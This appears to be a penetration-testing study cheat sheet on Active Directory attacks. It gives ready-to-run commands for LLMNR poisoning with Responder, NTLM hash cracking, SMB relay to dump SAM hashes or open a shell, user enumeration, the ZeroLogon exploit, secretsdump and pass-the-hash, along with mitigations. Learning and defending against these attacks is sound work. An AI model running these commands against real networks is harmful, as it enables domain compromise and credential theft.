Resources


LLMNR Attack


RESPONDER

Principle

exploit-llmnr-principle.png Credit: TCM Security

Hands On

responder -l tun0 -dw
Capture NTLM Hashes when DNS error occurs.

tool-responder-llmnr_hash_capture.png

hashcat -a 0 -m 5600 myHashes.txt /usr/share/wordlists/rockyou.txt
Crack NetNTMLv2 hashes.

Mitigation

  • Disable LLMNR and NBT-NS
    • Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client > Multicast Name Resolution > OFF
    • Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced > WINS > NetBIOS over TCP/IP > Disable
  • If this cannot be disabled
    • Network Access Control.
    • Enforce strong user password (over 14 characters) in order to make it harder to crack hashes.

Credit: TCM Security

SMB Relay Attack


IMPACKET NTMLRELAYX

Principle

Relay captured Hashes without cracking them to a SMB Server.

Requirements & Limitations

  • SMB Signing must be disabled on the target.
  • The user that is relayed has to be admin on the target.
  • It is not possible to relay a user to the same machine.

Scan for vulnerable hosts (SMB Signing disabled)

nmap --script=smb2-security-mode.nse -p445 [TARGET_IP]
Scan for disabled SMB Signing.

tool-nmap-smb_signing.png

Hands on

Capture Hashes

Update Responder configuration to capture hashes but not respond.

/usr/share/responder/Responder.conf

[Responder Core]

; Servers to start
SQL = On
#SMB = On # HERE #
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off

responder -l tun0 -dw
Capture NTLM Hashes when DNS error occurs.

tool-responder-llmnr_hash_capture.png

Relay Attacks

python3 /opt/impacket/examples/ntlmrelayx.py -tf myTargets.txt -smb2support --no-multirelay
Relay NTLM Hash and Dump Sam Hashes.

tool-ntlmrelayx-smb_relay_dump_sam.png.png

** /!\ TO CHECK /!\ **

python3 /opt/impacket/examples/ntlmrelayx.py -tf myTargets.txt -smb2support --no-multirelay -i
Relay NTLM Hash and start a Bind Shell.

tool-ntmlrelayx-smb_relay_reverse_shell.png

nc 127.0.0.1 11000 Connect to the shell.

Mitigation

  • Enable SMB Signing on all devices
    • Warning: May cause performance issues with file copies
  • Disable NTML authentication on network
    • Warning: NTML is the backup solution when Kerberos don't work, NTML may be required by some applications.
  • Limit high privilege accounts to specific tasks (e.g. Domain Admins only log when a Domain Admin access is required).
  • Enforce Local admins restriction.

Credit: TCM Security

Find Valid Users


KERBRUTE (Brute Force)

kerbrute -dc-ip [TARGET_DC_IP] -domain [TARGET_DOMAIN] -users myUserList.txt -t 10
Find valid users by testing all usernames in a list (-t is for thread).


IMPACKET GETNUPUSERS (Users No Pre-Auth Required)

python3 /opt/impacket/examples/GetNPUsers.py [TARGET_DOMAIN]/myUser -dc-ip [TARGET_DC_IP] -no-pass
Check for users that do not require Pre-Authentication.

Exploit


ZeroLogon Exploit (CVE-2020-1472)

Warning

This exploit could destroy the Domain Controller if you don’t restore the password after the attack.

Check if Vulnerable

https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py myNetBIOSDCName [TARGET_DC_IP]
Check if target is vulnerable to CVE-2020-1472

Hands On

Exploit

https://github.com/Sq00ky/Zero-Logon-Exploit/blob/master/zeroLogon-NullPass.py

python3 zeroLogon-NullPass.py myNetBIOSDCName [TARGET_DC_IP]
Run the exploit: bypass authentication and change the password to a null value.

Hash Dump

python3 /opt/impacket/examples/secretsdump.py myNetBIOSDCName\$@[TARGET_DC_IP] -no-pass
Connect with empty password (after Zerologon exploit) and dump hashes.

Pass the Hash

evil-winrm -i [TARGET_IP] -u [myUser] -H [myUserNTHASH]
Pass the Hash attack (NT Hash).

Restore the machine state

python3 /opt/impacket/examples/secretsdump.py Administrator@[TARGET_DC_IP] -hashes myAdminHash
Dump secrets, look for plain_password_hex.

https://github.com/dirkjanm/CVE-2020-1472

python3 restorepassword.py DOMAIN/myNetBIOSDCName@myNetBIOSDCName -target-ip [TARGET_DC_IP] -hexpass myPlainPasswordHex Restore the password.